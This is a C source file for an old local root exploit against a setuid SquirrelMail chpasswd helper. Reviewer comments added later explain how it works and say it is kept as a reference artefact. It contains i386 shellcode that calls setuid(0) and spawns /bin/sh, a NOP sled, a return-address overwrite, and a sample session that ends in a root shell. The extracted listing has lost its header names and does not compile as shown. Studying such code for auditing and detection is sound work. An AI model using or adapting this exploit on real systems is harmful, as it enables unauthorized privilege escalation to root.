/*
 * sq-chpass-exp.c
 * Squirrelmail chpasswd local root exploit by deadcraft
 * Bug founded by Matias Neiff
 *
 * Should work with only full path to chpasswd specified, but if isn't
 * You can simply move RET address by adding second parameter, for example:
 *
 * compilation: gcc -o sq-chpass-exp sq-chpass-exp.c
 *
 * ./sq-chpass-exp /path/to/chpasswd 100
 * RET = 0xbffff8bc
 * OFFSET = 0xbffff8e8
 * You forgot the New password.
 * Illegal instruction
 *
 * deadcraft@dns:~/change_passwd$ ./sq-chpass-exp /path/to/chpasswd 700
 * RET = 0xbffffb14
 * OFFSET = 0xbffffb40
 * You forgot the New password.
 * sh-2.05a#
 *
 * greetz to Bucz, evilcat and all friends ;)
 */

/* NOTE(review): historical proof-of-concept for a stack-based overflow in a
 * setuid "chpasswd" helper (the ~/change_passwd directory in the session above
 * suggests the SquirrelMail change_passwd plugin, but the page does not say).
 * The helper is started with two attacker-built argv strings; the hard-coded
 * 0xbffff... addresses and the i386 shellcode assume a 32-bit, pre-ASLR,
 * executable-stack Linux host, so NX, ASLR and stack canaries all defeat this
 * construction as written. Kept as a reference artefact: the NOP-sled-plus-
 * shellcode layout below is a classic signature pattern, and the root cause —
 * a setuid helper that apparently does not bound its argv input — is what an
 * audit should look for. */

/* NOTE(review): the header names after these two #include lines were lost in
 * extraction (presumably <stdio.h> and <string.h>, judging by the calls in
 * main); the listing as shown does not compile. */
#include
#include

#define SIZE 150   /* length of buf1: argv[1], filled with the return address */
#define SIZE2 500  /* length of buf2: argv[2], NOP sled followed by the shellcode */

/* i386 Linux shellcode, 44 bytes plus the string's NUL. The bytes decode to a
 * setuid(0) system call, then execve("//bin/sh", ...), then exit(). The doubled
 * slash is the usual trick to make the path string 8 bytes long with no NUL. */
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0"
"\xb0\x01\xcd\x80";

/* Returns the caller's stack pointer.
 * There is no C return statement: the function relies on the inline asm leaving
 * %esp in %eax, which the i386 ABI happens to use for the return value. That is
 * undefined behaviour in C and only works on this one ABI with optimisation
 * that does not touch %eax afterwards. */
unsigned long get_esp() {
    __asm__ ("movl %esp,%eax");
}

/* Entry point.
 * argv[1]: full path of the target chpasswd binary (passed straight to execl).
 * argv[2]: optional decimal offset added to the current stack pointer to derive
 *          the return address; without it a fixed address is used.
 * Builds the two payload buffers, prints the chosen address, and replaces this
 * process with the target. Returns 0 only if execl fails (the failure is not
 * reported). */
int main(int argc, char *argv[]) {
    int offset, ret, i;
    char buf1[SIZE], buf2[SIZE2];

    /* buf2: 0x90 (x86 NOP) up to the shellcode, then the shellcode copied with
     * sizeof (so including its NUL terminator) into the tail, leaving the last
     * 8 bytes of the array uninitialised. */
    memset(buf2, 0x90, sizeof(buf2)-strlen(shellcode)-8);
    memcpy(buf2 + sizeof(buf2)-strlen(shellcode)-8 , shellcode, sizeof(shellcode));

    /* Argument check happens after the buffer setup; nothing above reads argv,
     * so this is only a style issue. */
    if ((argc != 3) && (argc != 2)) {
        printf("Usage: %s full path to chpasswd\n",argv[0]);
        exit(0);
    }

    if (argc==3) {
        /* atoi() gives no error indication; a non-numeric argv[2] becomes 0.
         * ret is an int holding a pointer-sized value, which only fits on the
         * 32-bit target this code assumes. */
        offset=atoi(argv[2]);
        ret=get_esp()+offset-strlen(shellcode)-strlen(argv[1]);
        printf("OFFSET = 0x%x\n", get_esp() + offset);
    } else
        ret = 0xbffffb14;   /* fixed value taken from the author's own run (see header) */

    printf("RET = 0x%x\n",ret);

    /* buf1: every 4-byte slot holds ret. The array is never NUL-terminated, so
     * execl reads past its end when looking for the end of the argv string —
     * undefined behaviour that the author relies on. */
    for(i=0; i < SIZE; i+=4) {
        * (long *) &buf1[i] = ret;
    }

    /* Hand both buffers to the target as argv[1] and argv[2]. The trailing
     * sentinel should be (char *)NULL rather than a bare 0 to be portable. */
    execl(argv[1],"chpasswd",buf1, buf2,0);
    return 0;
}